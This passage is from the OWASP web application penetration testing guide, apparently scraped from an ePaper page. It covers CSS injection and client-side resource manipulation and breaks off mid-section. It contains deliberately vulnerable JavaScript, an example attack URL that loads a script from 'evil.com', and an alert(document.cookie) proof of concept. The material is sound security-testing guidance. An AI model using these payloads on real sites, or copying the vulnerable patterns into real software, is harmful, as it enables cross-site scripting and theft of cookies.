4.0
1NSchAb
1NSchAb
- No tags were found...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
193<br />
Web Application Penetration Testing<br />
as attributes “style”.<br />
Gray Box testing<br />
Testing for CSS Injection vulnerabilities:<br />
Manual testing needs to be conducted and the JavaScript code<br />
analyzed in order to understand whether the attackers can inject<br />
its own content in CSS context. In particular we should be<br />
interested in how the website returns CSS rules on the basis of<br />
the inputs.<br />
The following is a basic example:<br />
Click me<br />
Hi<br />
<br />
$(“a”).click(function(){<br />
$(“b”).attr(“style”,”color: “ + location.hash.slice(1));<br />
});<br />
<br />
The above code contains a source “location.hash” that is controlled<br />
by the attacker that can inject directly in the attribute<br />
“style” of an HTML element. As mentioned above, this may lead<br />
to different results on the basis of the adopted browser and the<br />
supplied payload.<br />
It is recommended that testers use the jQuery function css(property,<br />
value) in such circumstances as follows, since this would<br />
disallow any damaging injections. In general, we recommend to<br />
use always a whitelist of allowed characters any time the input is<br />
reflected in the CSS context.<br />
Click me<br />
Hi<br />
<br />
$(“a”).click(function(){<br />
$(“b”).css(“color”,location.hash.slice(1));<br />
});<br />
<br />
• Password “cracker” via CSS and HTML5 - http://html5sec.org<br />
invalid/?length=25<br />
• CSS attribute reading - http://eaea.sirdarckcat.net/cssar/v2/<br />
Testing for Client Side Resource Manipulation<br />
(OTG-CLIENT-006)<br />
Summary<br />
A ClientSide Resource Manipulation vulnerability is an input validation<br />
flaw that occurs when an application accepts an user<br />
controlled input which specifies the path of a resource (for example<br />
the source of an iframe, js, applet or the handler of an XM-<br />
LHttpRequest). Specifically, such a vulnerability consists in the<br />
ability to control the URLs which link to some resources present<br />
in a web page. The impact may vary on the basis of the type of<br />
the element whose URL is controlled by the attacker, and it is<br />
usually adopted to conduct Cross-Site Scripting attacks.<br />
How to Test<br />
Such a vulnerability occurs when the application employs user<br />
controlled URLs for referencing external/internal resources. In<br />
these circumstances it is possible to interfere with the expected<br />
application’s behavior in the sense of making it load and render<br />
malicious objects.<br />
The following JavaScript code shows a possible vulnerable<br />
script in which the attacker is able to control the “location.hash”<br />
(source) which reaches the attribute “src” of a script element.<br />
This particular obviously leads XSS since an external JavaScript<br />
could be easily injected in the trusted web site.<br />
<br />
var d=document.createElement(“script”);<br />
if(location.hash.slice(1))<br />
d.src = location.hash.slice(1);<br />
document.body.appendChild(d);<br />
<br />
Specifically the attacker could target the victim by asking her to<br />
visit the following URL:<br />
www.victim.com/#http: /evil.com/js.js<br />
References<br />
OWASP Resources<br />
• DOM based XSS Prevention Cheat Sheet<br />
• DOMXSS Wiki - https://code.google.com/p/domxsswiki/wiki<br />
CssText<br />
Presentations<br />
• DOM Xss Identification and Exploitation, Stefano Di Paola<br />
http://dominator.googlecode.com/files/DOMXss_<br />
Identification_and_exploitation.pdf<br />
• Got Your Nose! How To Steal Your Precious Data Without<br />
Using Scripts, Mario Heiderich - http://www.youtube.com/<br />
watch?v=FIQvAaZj_HA<br />
• Bypassing Content-Security-Policy, Alex Kouzemtchenko<br />
http://ruxcon.org.au/assets/slides/CSP-kuza55.pptx<br />
Proof of Concepts<br />
Where js.js contains:<br />
alert(document.cookie)<br />
Controlling scripts’ sources is a basic example, since some other<br />
interesting and more subtle cases can take place. A widespread<br />
scenario involves the possibility to control the URL called in a<br />
CORS request; since CORS allows the target resource to be accessible<br />
by the requesting domain through a header based approach,<br />
then the attacker may ask the target page to load malicious<br />
content loaded on its own web site.<br />
Refer to the following vulnerable code:<br />